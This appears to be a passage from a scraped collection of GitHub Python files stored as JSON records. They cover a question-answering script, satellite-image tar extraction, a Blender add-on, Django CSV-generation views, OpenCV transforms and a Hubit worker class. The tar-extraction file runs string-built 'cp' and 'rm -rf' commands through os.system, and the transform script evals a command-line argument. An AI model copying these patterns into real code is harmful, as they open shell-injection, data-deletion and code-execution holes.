'whose']:\r\n answer_type = ['PERSON', 'NORP', 'ORG']\r\n if question_signifier == 'what':\r\n answer_type = ['NORP', 'FAC', 'ORG', 'LOC', 'PRODUCT', 'EVENT', 'WORK_OF_ART', 'LAW', 'LANGUAGE', 'DATE', 'TIME', 'QUANTITY']\r\n elif question_signifier == 'where':\r\n answer_type = ['LOC', 'GPE']\r\n elif question_signifier == 'when':\r\n answer_type = ['TIME', 'EVENT', 'DATE']\r\n elif question_signifier == 'how':\r\n if rest[0] in [\"few\", \"little\", \"much\", \"many\", \"large\", \"big\"]:\r\n answer_type = ['PRODUCT', 'PERCENT', 'MONEY', 'QUANTITY', 'ORDINAL', 'CARDINAL']\r\n elif rest[0] in [\"young\", \"old\"]:\r\n answer_type = 'TIME'\r\n elif rest[0] == 'do':\r\n answer_type = ['LAW', 'PERSON']\r\n elif rest[0] == \"long\":\r\n if rest[1] in [\"until\", \"till\", \"before\"]:\r\n answer_type = ['TIME', 'DATE', 'QUANTITY', 'ORDINAL', 'CARDINAL']\r\n elif rest[1] == 'is':\r\n answer_type = ['NUMERIC', 'TIME', 'QUANTITY', 'ORDINAL', 'CARDINAL']\r\n \r\n return answer_type\r\n\r\n\r\ndef populate_database(raw_db):\r\n \"\"\"\r\n Populates the database with sentences from raw_db txt file\r\n that it labels with scapy\r\n \"\"\"\r\n\r\n with open(raw_db, 'r') as file:\r\n data = file.readlines()\r\n\r\n for sentence in data:\r\n \r\n entry = nlp_entity_recog(sentence)\r\n for ent in entry.ents:\r\n database[ent.label_].append(sentence)\r\n\r\n return\r\n\r\n\r\ndef database_lookup(question, keywords, answer_types):\r\n \"\"\"\r\n Looks up sentences in our database with labels given by answer_types\r\n and then gives each of those sentences a score.\r\n \"\"\"\r\n\r\n possible_sentences = []\r\n \r\n # doing an initial filter of the database\r\n for answer_type in answer_types:\r\n for sentence in database[answer_type]:\r\n for keyword in keywords:\r\n if keyword in sentence:\r\n possible_sentences.append(sentence)\r\n \r\n # now doing a simple max keyword hueristic\r\n rankings = []\r\n kw_score = 0\r\n if len(possible_sentences) > 0:\r\n for sentence in possible_sentences:\r\n for keyword in keywords:\r\n if keyword in sentence:\r\n kw_score += 1\r\n \r\n rankings.append([kw_score, sentence])\r\n kw_score = 0\r\n\r\n max_rank = max(rankings)[0] \r\n # removing lower scores\r\n for sentence in rankings:\r\n if sentence[0] < max_rank:\r\n rankings.remove(sentence)\r\n\r\n # computing keyword proximity heuristic\r\n proximity = 0\r\n proximity_total = 0\r\n for sentence in rankings:\r\n tokens = nltk.word_tokenize(sentence[1])\r\n for word in tokens:\r\n if word in keywords and proximity == 0:\r\n proximity += 1\r\n if word in keywords and proximity > 0:\r\n proximity_total += proximity\r\n proximity = 0\r\n if word not in keywords:\r\n proximity += 1\r\n \r\n proximity_total /= len(keywords)\r\n sentence[0] = proximity_total\r\n\r\n min_rank = min(rankings)[0] \r\n # removing higher scores (since lower is better for this heuristic)\r\n for sentence in rankings:\r\n if sentence[0] > min_rank:\r\n rankings.remove(sentence)\r\n \r\n answer = min(rankings)\r\n\r\n\r\n return answer[1]\r\n\r\n return \"\"\r\n\r\n\r\ndef get_answer(question, sentence, answer_type):\r\n \"\"\"\r\n Returns the answer to the question given by sentence. \r\n Prints \"Could not find an answer.\" if database lookup returns -1\r\n \"\"\"\r\n if sentence == \"\":\r\n print(\"Answer could not be found!\")\r\n return\r\n else:\r\n print(\"The answer to question: %s is: \" % question)\r\n answer_sent = nlp_entity_recog(sentence)\r\n for ans in answer_sent.ents:\r\n if ans.label_ in answer_type:\r\n print(ans.text)\r\n return\r\n\r\n\r\ndef main():\r\n\r\n populate_database(\"whitman.txt\")\r\n\r\n question1 = \"Who is the President of Whitman College?\"\r\n question2 = \"Where is Whitman College located?\"\r\n\r\n # question 1\r\n keywords = find_key_words(question2)\r\n answer_type = question_classification(question2)\r\n sentence = database_lookup(question2, keywords, answer_type)\r\n get_answer(question2, sentence, answer_type)\r\n\r\n # question 2\r\n keywords = find_key_words(question1)\r\n answer_type = question_classification(question1)\r\n sentence = database_lookup(question1, keywords, answer_type)\r\n get_answer(question1, sentence, answer_type)\r\n \r\n return\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bantaisaiah/Whitman-Factoid-Question-Answering","sub_path":"qanda_system.py","file_name":"qanda_system.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"27211479403","text":"import os, sys\nimport tarfile\nimport shutil\nimport warnings\nimport xml.etree.cElementTree as etree\nfrom shapely.geometry import Polygon, shape\nimport fiona\nimport numpy as np\n\ndef load_shape(shapefile, buffer=0.02):\n # This function creates a shape to make a selection of usable bursts later on. Buffer around shape is in\n # degrees.\n\n if not shapefile:\n warnings.warn('Please provide a shapefile or coordinates.')\n\n try:\n if isinstance(shapefile, list): # If the coordinates are already loaded. (for example bounding box)\n shp = Polygon(shapefile)\n else: # It should be a shape file. We always select the first shape.\n sh = next(iter(fiona.open(shapefile)))#.next()\n shp = shape(sh['geometry'])\n\n # Now we have the shape we add a buffer and simplify first to save computation time.\n shp = shp.simplify(buffer / 2)\n shp = shp.buffer(buffer)\n except:\n warnings.warn('Unrecognized shape')\n return\n\n return shp\n\ndef extract_kml_preview(tarred_folder, dir='', kml=True, png=True, overwrite=False):\n # Extracts quicklook and/or .kml files.\n\n if not dir:\n dir = os.path.dirname(tarred_folder)\n \n #base file names\n base_name = os.path.basename(tarred_folder)[:-7]\n first_folder_name = base_name[:13]+'_____'+base_name[18:-4]\n xml_file = first_folder_name+'/'+first_folder_name+'.xml'\n kml_file = first_folder_name+'/SUPPORT/GEARTH_POLY.kml'\n preview_file = first_folder_name+'/PREVIEW/BROWSE.tif'\n \n #new file names\n xml_name = os.path.join(dir, first_folder_name + '.xml')\n kml_name = os.path.join(dir, first_folder_name + '.kml')\n tif_name = os.path.join(dir, first_folder_name + '.tif')\n \n #unzipped file names\n unzipped_xml = os.path.join(dir, xml_file)\n unzipped_kml = os.path.join(dir, kml_file)\n unzipped_tif = os.path.join(dir, preview_file)\n \n #only extract if required\n if not os.path.exists(kml_name) or not os.path.exists(tif_name) or not os.path.exists(xml_name):\n #print('aay')\n my_tar = tarfile.open(tarred_folder)\n my_tar.extract(xml_file, dir)\n my_tar.extract(kml_file, dir)\n my_tar.extract(preview_file, dir)\n my_tar.close()\n \n if not os.path.exists(xml_name) or overwrite == True:\n os.system('cp '+ unzipped_xml +' '+ xml_name)\n if not os.path.exists(kml_name) or overwrite == True:\n os.system('cp '+ unzipped_kml +' '+ kml_name)\n if not os.path.exists(tif_name) or overwrite == True:\n os.system('cp '+ unzipped_tif +' '+ tif_name)\n if os.path.exists(os.path.join(dir, first_folder_name)):\n os.system('rm -rf ' + os.path.join(dir, first_folder_name))\n \n return xml_name, kml_name, tif_name\n\n\ndef shape_im_kml(shp, kml_file):\n # This script extracts a Fiona/polygon shape of the footprint given in the .xml file of the image and checks whether\n # it overlaps\n\n # First check is .kml file exist\n if not os.path.exists(kml_file):\n warnings.warn('.kml file does not exist.')\n return False\n\n try:\n in_kml = etree.parse(kml_file)\n in_kml = in_kml.getroot()\n coor = in_kml[0][3][3][0][0].text\n \n coor = [i.split(',')[:-1] for i in coor.split('\\n')][1:-1]\n \n coverage = Polygon([[float(i[0]),float(i[1])] for i in coor])\n except:\n warnings.warn('.kml file is corrupt')\n return False\n\n if coverage.intersects(shp):\n return True\n else:\n return False\n\n\n\ndef unzip_folder(tarred_folder, dest_folder, overwrite=False, cos_file_name='IMAGE_VV_SRA_strip_009.cos'):\n # Extracts quicklook and/or .kml files.\n\n if not dest_folder:\n dest_folder = os.path.dirname(tarred_folder)\n\n png_name = ''\n kml_name = ''\n \n #base file names\n base_name = os.path.basename(tarred_folder)[:-7]\n first_folder_name = base_name[:13]+'_____'+base_name[18:-4]\n \n cos_file = first_folder_name+'/IMAGEDATA/'+cos_file_name\n xml_file = first_folder_name+'/'+first_folder_name+'.xml'\n #new file names\n cos_d_name = os.path.join(dest_folder, first_folder_name + '.cos')\n xml_file_name = os.path.join(dest_folder, first_folder_name+'.xml')\n \n #unzipped file names\n unzipped_cos = os.path.join(dest_folder, cos_file)\n unzipped_xml = os.path.join(dest_folder, xml_file)\n \n #only extract if required\n #TODO make changes for not xtracting once the data is dumped into stack folder\n if not os.path.exists(cos_d_name) and not os.path.exists(xml_file_name):\n my_tar = tarfile.open(tarred_folder)\n my_tar.extract(cos_file, dest_folder)\n my_tar.extract(xml_file, dest_folder)\n my_tar.close()\n \n if not os.path.exists(cos_d_name) or overwrite == True:\n os.system('cp '+ unzipped_cos +' '+ cos_d_name)\n if not os.path.exists(xml_file_name) or overwrite == True:\n os.system('cp '+ unzipped_xml +' '+ xml_file_name)\n if os.path.exists(os.path.join(dest_folder, first_folder_name)):\n os.system('rm -rf ' + os.path.join(dest_folder, first_folder_name))\n \n #return cos_d_name, xml_file_name\n\n\nif __name__=='__main__':\n tarred_folder = sys.argv[1]\n dest_folder = sys.argv[2]\n overwrite = sys.argv[3]\n image_cos_file = sys.argv[4]\n \n if overwrite == 'False':\n overwrite = False\n else:\n overwrite = True\n \n print('tarred folder is ' + tarred_folder)\n print('destination folder is ' + dest_folder)\n \n unzip_folder(tarred_folder, dest_folder, overwrite=overwrite, cos_file_name=image_cos_file)\n","repo_name":"anurag-kulshrestha/PAZ_InSAR","sub_path":"load_shape_unzip.py","file_name":"load_shape_unzip.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"13332599323","text":"import sys\nfrom collections import deque\n\nn, m = map(int, sys.stdin.readline().split())\nqueue = deque([idx for idx in range(1, n + 1)])\n\n\nprint(\"<\", end=\"\")\ncycle = 0\ncnt = 0\nwhile queue:\n value = queue.popleft()\n\n cycle += 1\n if cycle == m:\n cnt += 1\n cycle = 0\n\n if cnt == n:\n print(value, end=\"\")\n else:\n print(value, end=\", \")\n else:\n queue.append(value)\n\nprint(\">\")\n","repo_name":"Meantint/Baekjoon","sub_path":"Silver IV/BOJ_11866/BOJ_11866.py","file_name":"BOJ_11866.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9553380585","text":"import bpy\nfrom bpy.types import AddonPreferences\nfrom bpy.props import StringProperty\nfrom bpy.props import EnumProperty\nfrom platform import system\n\nclass RhubarbAddonPreferences(AddonPreferences):\n bl_idname = __package__\n\n executable_path : StringProperty(\n name=\"Rhubarb lipsync executable\",\n subtype='FILE_PATH',\n default=bpy.utils.user_resource('SCRIPTS', path=\"addons\") + '/blender-rhubarb-lipsync/bin/rhubarb' + ('.exe' if system() == 'Windows' else '')\n )\n\n recognizer : EnumProperty(\n name = \"Recognizer\",\n items = [\n (\"pocketSphinx\", \"pocketSphinx\", \"PocketSphinx is an open-source speech recognition library that generally gives good results for English.\"),\n (\"phonetic\", \"phonetic\", \"This recognizer is language-independent. Use it if your recordings are not in English.\")\n ],\n default = \"pocketSphinx\"\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"executable_path\")\n layout.prop(self, \"recognizer\")\n\ndef register():\n bpy.utils.register_class(RhubarbAddonPreferences)\n\n\ndef unregister():\n bpy.utils.unregister_class(RhubarbAddonPreferences)","repo_name":"scaredyfish/blender-rhubarb-lipsync","sub_path":"prefs_blender_rhubarb.py","file_name":"prefs_blender_rhubarb.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"66"} +{"seq_id":"32230295789","text":"from collections import Counter\n\nclass Solution:\n def minIncrementForUnique(self, nums):\n # Time Complexity O(N+M)\n # Space Complexity O(N+M)\n max_val = max(nums)\n count = Counter(nums)\n duplicate = []\n increment = 0\n\n # why the range is len(nums) + max_val ?\n # If all of elements are the same, such as [1, 5, 5]\n # we have to count (3 + 5) - 1 time\n for n in range(len(nums) + max_val):\n # if a number is duplicate in the nums list\n if count[n] >= 2:\n # if there is a duplicate number\n # N duplicate we store the rest of N-1\n duplicate.extend([n] * (count[n] - 1))\n \n # if the duplicate list is not empty, and \n # the count[i] position is not taken yet\n elif duplicate and count[n] == 0:\n # Count the difference between number n and the last element in the duplicate list\n # No matter the order the count the difference, the total difference will be the same.\n # e.g. [1, 5, 7, 4, 4, 3, 1]\n # (2 - 4) + (6 - 1) == (6 - 4) + (2 - 1)\n increment += (n - duplicate.pop())\n \n return increment\n\n def minIncrementForUnique1(self, nums):\n # Time Complexity O(NlogN)\n # Space Complexity O(N)\n nums.sort()\n increment = 0\n for i in range(1, len(nums)):\n pre = nums[i-1]\n cur = nums[i]\n if pre >= cur:\n increment += pre - cur + 1\n nums[i] = pre + 1\n\n return increment","repo_name":"max870701/LeetCodeRecord-Python3-","sub_path":"945-MinIncrementMakeArrayUnique.py","file_name":"945-MinIncrementMakeArrayUnique.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23365772012","text":"from django.views.generic import ListView, View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.loader import render_to_string\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import FileResponse, HttpResponseNotAllowed, JsonResponse\nfrom django.forms import formset_factory\nfrom .lib.generator_csv import GeneratorCSV\nfrom .forms import SchemaForm, ColumnForm, CountForm, ColumnFormSet\nfrom .models import Schema, CSV\nfrom . import tasks\nimport json\nimport os\n\n# HEROKU_FIX_FILE_CELERY\nfrom django.conf import settings as django_setting\nfrom django.core.files.base import ContentFile\n\n\n# Create your views here.\nclass SchemasView(LoginRequiredMixin, ListView):\n template_name = 'webcsv/schemas.html'\n context_object_name = 'schemas'\n login_url = '/login/'\n redirect_field_name = '/next/'\n allow_empty = True\n\n def get_queryset(self):\n return Schema.objects.filter(user=self.request.user)\n\n def get_context_data(self, *args, **kwargs):\n context_data = super().get_context_data(*args, **kwargs)\n context_data['title'] = 'Schemas'\n return context_data\n\n\n@login_required(login_url='login')\ndef new_schema(request):\n prefix = 'cform'\n if request.method == 'POST':\n schema_form = SchemaForm(data=request.POST)\n SchemaColumnFormSet = formset_factory(form=ColumnForm, can_order=True,\n min_num=1, validate_min=True)\n formset = SchemaColumnFormSet(request.POST, prefix=prefix)\n if schema_form.is_valid():\n current_schema = schema_form.save(commit=False)\n current_schema.user = request.user\n if formset.is_valid():\n current_schema.save()\n for form in formset:\n if form.cleaned_data:\n new_column = form.save(commit=False)\n new_column.schema = current_schema\n new_column.order = form.cleaned_data['ORDER']\n if new_column.datatype in GeneratorCSV.with_extra:\n extra = {}\n datatype_obj = GeneratorCSV.get_datatype_obj(new_column.datatype)\n for param in datatype_obj.extra_params:\n extra[param] = form.cleaned_data[param]\n\n new_column.extra = extra\n\n new_column.save()\n return redirect('webcsv:schemas')\n else:\n schema_form = SchemaForm()\n SchemaColumnFormSet = formset_factory(form=ColumnForm, can_order=True)\n formset = SchemaColumnFormSet(prefix=prefix)\n context = {\n 'title': 'New schema',\n 'schema_form': schema_form,\n 'formset': formset,\n 'with_extra': GeneratorCSV.with_extra,\n 'base_prefix': prefix,\n }\n return render(request, 'webcsv/new_schema.html', context=context)\n\n\n@login_required(login_url='login')\ndef delete_schema(request, schema_id):\n if request.method == 'GET':\n schema_obj = get_object_or_404(Schema, pk=schema_id, user=request.user)\n schema_obj.delete()\n return redirect('webcsv:schemas')\n\n\n@login_required(login_url='login')\ndef edit_schema(request, schema_id):\n prefix = 'cform'\n schema_obj = get_object_or_404(Schema, pk=schema_id, user=request.user)\n\n if request.method == 'POST':\n schema_form = SchemaForm(data=request.POST, instance=schema_obj)\n formset = ColumnFormSet(request.POST, prefix=prefix, instance=schema_obj,\n hide_fields=['DELETE', 'schema', 'id'])\n if schema_form.is_valid():\n schema_form.save()\n if formset.is_valid():\n formset.save()\n return redirect('webcsv:schemas')\n else:\n schema_form = SchemaForm(instance=schema_obj)\n formset = ColumnFormSet(prefix=prefix, instance=schema_obj,\n hide_fields=['DELETE', 'schema', 'id'])\n context = {\n 'title': 'Edit schema',\n 'schema_form': schema_form,\n 'formset': formset,\n 'with_extra': GeneratorCSV.with_extra,\n 'base_prefix': prefix,\n }\n return render(request, 'webcsv/edit_schema.html', context=context)\n\n\nclass SchemaDatasView(LoginRequiredMixin, View):\n login_url = 'login'\n redirect_field_name = 'next'\n\n def get(self, request, schema_id):\n schema_obj = get_object_or_404(Schema, pk=schema_id, user=request.user)\n csvs = schema_obj.csv_set.all()\n form = CountForm(initial={\"count\": 200})\n\n context = {\n 'title': 'Generate csv',\n 'form': form,\n 'schema_obj': schema_obj,\n 'csvs': csvs,\n 'status_pending': 'pending',\n }\n return render(request, 'webcsv/csvs.html', context=context)\n\n\n@require_POST\ndef generate_csv(request, schema_id):\n status = {'error_ajax': True, 'result': ''}\n if request.is_ajax():\n try:\n req_data = json.loads(request.body.decode())\n count = int(req_data['count'])\n last_number = int(req_data['lastNumber'])\n\n schema_obj = Schema.objects.get(pk=schema_id)\n csv_obj = CSV.create_fp(schema_obj=schema_obj)\n csv_obj.save()\n\n tasks.create_csv.delay(schema_id, count, csv_obj.pk)\n new_csv_template = render_to_string('webcsv/_csv.html', request=request,\n context={\n 'csv': csv_obj,\n 'status_pending': 'pending',\n 'forloop': {'counter': last_number + 1}})\n response = {\n 'error_ajax': False,\n 'csv_id': csv_obj.id,\n 'status': 'new csv template',\n 'result': new_csv_template,\n }\n return JsonResponse(response)\n except:\n status['status'] = 'Internal error'\n else:\n status['status'] = 'Not allowed method'\n return JsonResponse(status)\n\n\n@require_POST\ndef check_csv(request, schema_id):\n status = {'error_ajax': True, 'result': ''}\n if request.is_ajax():\n try:\n req_data = json.loads(request.body.decode())\n ajax_csv = req_data['pendingCSV']\n if not isinstance(ajax_csv[0], int):\n ajax_csv = list(map(lambda i: int(i), ajax_csv))\n\n csvs_objs = Schema.objects.get(pk=schema_id).csv_set.all()\n\n ready_csv = []\n pending_csv = []\n error_csv = []\n for csv_obj in csvs_objs.filter(pk__in=ajax_csv):\n if csv_obj.ready == True:\n ready_csv.append(csv_obj.id)\n elif csv_obj.ready == False:\n pending_csv.append(csv_obj.id)\n elif csv_obj.ready == None:\n error_csv.append(csv_obj.id)\n\n response = {\n 'error_ajax': False,\n 'status': 'Http ready column',\n 'result': {'ready_csv': ready_csv, 'pending_csv': pending_csv, 'error_csv': error_csv},\n }\n return JsonResponse(response)\n except Exception as e:\n # print(e,type(e))\n status['status'] = 'Internal error'\n else:\n status['status'] = 'Not allowed method'\n return JsonResponse(status)\n\n\n@login_required(login_url='login')\n@require_GET\ndef download_csv(request, csv_id):\n if request.method == 'GET':\n csv_obj = get_object_or_404(CSV, pk=csv_id, schema__user=request.user)\n path = csv_obj.path\n if csv_obj.ready == None:\n return redirect('webcsv:csvs', csv_obj.schema.pk)\n\n if django_setting.HEROKU_FIX_FILE_CELERY:\n try:\n data = tasks.get_file_data.delay(path, csv_id).get(timeout=5)\n if not data:\n raise FileNotFoundError\n except:\n return redirect('webcsv:csvs', csv_obj.schema.pk)\n data = data.encode()\n file_obj = ContentFile(data, name=csv_obj.filename).open('rb')\n else:\n try:\n file_obj = open(path, 'rb')\n except FileNotFoundError:\n csv_obj.ready = None\n csv_obj.save()\n return redirect('webcsv:csvs', csv_obj.schema.pk)\n\n return FileResponse(file_obj, as_attachment=True)\n return HttpResponseNotAllowed(['GET'])\n","repo_name":"nikolxxlyes/csv_django_job","sub_path":"project/webcsv/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72259353491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nCreated on : 30 Aug 2016\n\nDescription: apply_transform.py\n Apply Perspective transformation on images\n\n Usage:\n\n Example1\n python3 apply_transform.py --image ../images/card.jpg\n --coords \"[(434, 90), (793, 106),(614, 608), (150, 480)]\"\n\n Example2\n python3 apply_transform.py --image ../images/paper.jpg\n --coords \"[(152,394),(477,222),(562,330),(205,508)]\"\n\n@ author : sampathsingamsetty\n\"\"\"\n\nfrom transform import fourpoint_transform\nimport numpy as np\nimport argparse\nimport cv2\n\n# argument parsing for the input args\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", help=\"Path to them Image\")\nap.add_argument(\"-c\", \"--coords\", help=\"comma delimited list of source points\")\nargs = vars(ap.parse_args())\n\n# load the image and capture the list of (x, y) points\nimage = cv2.imread(args[\"image\"])\n# supplied coordinates\npoints = np.array(eval(args[\"coords\"]), dtype='float32')\n\n# now apply the 4 point transform to get the \"birds eye view\"\n# of the supplied image\nwarped = fourpoint_transform(image, points)\n\n# display the original and warped image\ncv2.imshow(\"Original Image\", image)\ncv2.imshow(\"Warped Image\", warped)\ncv2.waitKey(0)\n","repo_name":"fpdevil/pycomcv","sub_path":"src/apply_transform.py","file_name":"apply_transform.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"44991416382","text":"from functools import reduce\nfrom timeit import timeit\n\nimport numpy as np\n\n\ndef read_input(filename: str) -> tuple:\n with open(filename, \"r\") as f:\n def to_int(i):\n return 1 if i == \"#\" else 0\n lines = f.read().split(\"\\n\\n\")\n enhancement = np.array(list(map(to_int, list(lines[0]))))\n img = np.array(list(map(lambda x: list(map(to_int, list(x))), lines[1].split(\"\\n\"))))\n return enhancement, img\n\ndef expand_img(img: np.array, expand) -> np.array:\n supplier = np.zeros if expand == 0 else np.ones\n new = supplier((img.shape[0] + 4, img.shape[1] + 4)).astype(int)\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n new[i + 2][j + 2] = img[i][j]\n return new\n\ndef bin_to_int(values: list):\n return reduce(lambda a, b: (a << 1) | b, [0] + values)\n\ndef enhance(enhancement, img, expand):\n img = expand_img(img, expand)\n enhanced_img = np.zeros((img.shape[0] - 2, img.shape[1] - 2)).astype(int)\n for i in range(1, img.shape[0] - 1):\n for j in range(1, img.shape[1] - 1):\n z = img[i - 1:i + 2, j - 1:j + 2].flatten()\n enhanced_img[i - 1][j - 1] = enhancement[bin_to_int(z.tolist())]\n return enhanced_img, enhancement[-expand]\n\n\ndef solve(values: tuple, n: int) -> int:\n enhancement, img = values\n inf_expand = 0\n for i in range(n):\n img, inf_expand = enhance(enhancement, img, inf_expand)\n return sum(sum(img))\n\ndef part_1(values: tuple) -> int:\n return solve(values, 2)\n\n\ndef part_2(values: tuple) -> int:\n return solve(values, 50)\n\n\nif __name__ == '__main__':\n test_input = read_input(\"test_input.txt\")\n assert part_1(test_input) == 35\n assert part_2(test_input) == 3351\n\n my_input = read_input(\"input.txt\")\n print(f\"Part 1: {part_1(my_input)}, Timing: %.2f ms\" % (1000 * timeit(lambda: part_1(my_input), number=1)))\n print(f\"Part 2: {part_2(my_input)}, Timing: %.2f ms\" % (1000 * timeit(lambda: part_2(my_input), number=1)))\n","repo_name":"lukeboxwalker/advent-of-code","sub_path":"year_2021/day_20/puzzle.py","file_name":"puzzle.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18314277497","text":"from __future__ import annotations\nimport json\nimport hashlib\nimport logging\nimport multiprocessing\nfrom multiprocessing.managers import SyncManager\nfrom multiprocessing import Value\nfrom ctypes import c_bool\nimport copy\nfrom typing import Any, Callable, Dict, Set, TYPE_CHECKING, List, Optional, Union\nfrom .config import FlatData, HubitBinding, HubitQueryPath, ModelIndexSpecifier\nfrom .tree import LengthTree\nfrom .utils import traverse, reshape, ReadOnlyDict\nfrom operator import itemgetter\n\nfrom .errors import HubitError, HubitWorkerError\n\nif TYPE_CHECKING:\n from .config import HubitModelComponent\n\n\nclass _Worker:\n \"\"\" \"\"\"\n\n RESULTS_FROM_CACHE_ID = \"cache\"\n RESULTS_FROM_CALCULATION_ID = \"calculation\"\n RESULTS_FROM_UNKNOWN = \"unknown\"\n\n def __init__(\n self,\n callback_ready: Callable,\n callback_completed: Callable,\n component: HubitModelComponent,\n query: HubitQueryPath,\n func: Callable,\n version: str,\n tree_for_idxcontext: Dict[str, LengthTree],\n manager: Optional[SyncManager] = None,\n dryrun: bool = False,\n caching: bool = False,\n ):\n \"\"\"\n If inputdata is None the worker cannot work but can still\n render itself and print.\n\n query for one specific location ie no [:]\n query is an internal path (dot-path)\n\n \"\"\"\n self.func = func # function to excecute\n self.id = component.id # name of the component\n self.name = component.name # name of the component\n self.version = version # Version of the component\n self._callback_ready = callback_ready\n self._callback_completed = callback_completed\n self.job = None # For referencing the job if using multiprocessing\n self.query = query\n self.tree_for_idxcontext = tree_for_idxcontext\n self.component = component\n self._consumed_data_set = False\n self._consumed_input_ready = False\n self._consumed_results_ready = False\n self._consumes_input_only = False\n self._results_id: Optional[str] = None\n self.input_checksum: Optional[str] = None\n self.results_checksum: Optional[str] = None\n self.caching = caching\n self._did_start = False\n\n # Store information on how results were created (calculation or cache)\n self._results_from = self.RESULTS_FROM_UNKNOWN\n\n if dryrun:\n # If worker should perform a dry run set the worker function to \"_work_dryrun\"\n self.workfun = self._work_dryrun\n else:\n self.workfun = self._work\n\n # Paths for values that are consumed but not ready\n self.pending_input_paths: List[HubitQueryPath] = []\n self.pending_results_paths: List[HubitQueryPath] = []\n\n # Stores required values using internal names as keys\n self.inputval_for_name: Dict[str, Any] = {}\n self.resultval_for_name: Dict[str, Any] = {}\n\n # Stores required values using internal names as keys\n self.inputval_for_path: Dict[HubitQueryPath, Any] = {}\n self.resultval_for_path: Dict[HubitQueryPath, Any] = {}\n\n # Which indices are specified for each index ID\n self.idxval_for_idxid = {}\n\n # To store provided results. Values stores with the internal\n # name specified in the model as the key\n self.results: Dict[str, Any]\n if manager is None:\n self.results = {}\n self._did_complete = False\n self.use_multiprocessing = False\n else:\n self.results = manager.dict()\n self._did_complete = Value(c_bool, False)\n self.use_multiprocessing = True\n\n # TODO\n # 1) Prune tree corresponding to query\n # 2) Prune remaining trees based idxval_for_idxid (method does no exist yet on LengthTree)\n\n # Creating self.idxval_for_idxid from \"provides_results\" assumes that\n # the providers have all index identifiers from \"consumes_input\" and\n # \"consumes_results\" defined excluding the ones that have a range = \":\".\n # This is reasonable since this assures that there is a well-defined place to\n # store the results.\n if self.component.does_provide_results():\n self.rpath_provided_for_name, self.idxval_for_idxid = _Worker.get_bindings(\n self.component.provides_results, query\n )\n self.provided_mpath_for_name = self.component.binding_map(\n \"provides_results\"\n )\n else:\n self.provided_mpath_for_name = None\n raise HubitWorkerError(\"No provider for Hubit model component '{self.id}'\")\n\n # Model path for input dependencies with ilocs from query\n if self.component.does_consume_input():\n self.ipath_consumed_for_name = _Worker.bindings_from_idxs(\n self.component.consumes_input, self.idxval_for_idxid\n )\n # Allow model path lookup by internal name\n iconsumed_mpath_for_name = self.component.binding_map(\"consumes_input\")\n else:\n self.ipath_consumed_for_name = {}\n iconsumed_mpath_for_name = {}\n\n # Model path for results dependencies with ilocs from query\n if self.component.does_consume_results():\n self._consumes_input_only = False\n self.rpath_consumed_for_name = _Worker.bindings_from_idxs(\n self.component.consumes_results, self.idxval_for_idxid\n )\n rconsumed_mpath_for_name = self.component.binding_map(\"consumes_results\")\n else:\n self._consumes_input_only = True\n self.rpath_consumed_for_name = {}\n rconsumed_mpath_for_name = {}\n\n self._id = self.idstr()\n\n # Expand model paths containing iloc wildcards\n if not tree_for_idxcontext == {}:\n self.ipaths_consumed_for_name = _Worker.expand(\n self.ipath_consumed_for_name,\n tree_for_idxcontext,\n iconsumed_mpath_for_name,\n )\n\n self.rpaths_consumed_for_name = _Worker.expand(\n self.rpath_consumed_for_name,\n tree_for_idxcontext,\n rconsumed_mpath_for_name,\n )\n\n self.rpaths_provided_for_name = _Worker.expand(\n self.rpath_provided_for_name,\n tree_for_idxcontext,\n self.provided_mpath_for_name,\n )\n\n self.iname_for_path = {\n path: key\n for key, paths in self.ipaths_consumed_for_name.items()\n for path in traverse(paths)\n }\n\n self.rname_for_path = {\n path: key\n for key, paths in self.rpaths_consumed_for_name.items()\n for path in traverse(paths)\n }\n\n logging.info(f'Worker \"{self.id}\" was created for query \"{self.query}\"')\n\n @property\n def status(self):\n return \"Not implemented\"\n\n @staticmethod\n def bindings_from_idxs(bindings: List[HubitBinding], idxval_for_idxid) -> Dict:\n \"\"\"\n replace index IDs with the actual indices\n if idxid from binding path not found in idxval_for_idxid it\n must correspond to a IDX_WILDCARD in the binding path.\n IDX_WILDCARD ignored in set_ilocs_on_path. Dealt with in expansion\n\n Returns path for name\n \"\"\"\n if len(idxval_for_idxid) == 0:\n return {binding.name: binding.path for binding in bindings}\n else:\n result = {}\n for binding in bindings:\n indices = []\n for model_index_spec in binding.path.get_index_specifiers():\n idxid = model_index_spec.identifier\n range = model_index_spec.range\n offset = model_index_spec.offset\n\n index: Optional[str]\n if range.is_digit:\n # already an index so no transformation required\n index = str(range)\n elif range.is_empty:\n # Map index ID to the value\n index = str(int(idxval_for_idxid[idxid]) + offset)\n elif range.is_full_range:\n # leave for subsequent expansion.\n # From the expansion method's perspective 'index' could be any character.\n index = range\n else:\n raise HubitError(f\"Unknown range '{range}'\")\n indices.append(ModelIndexSpecifier.from_components(idxid, index))\n\n result[binding.name] = binding.path.set_indices(indices, mode=1)\n return result\n\n @staticmethod\n 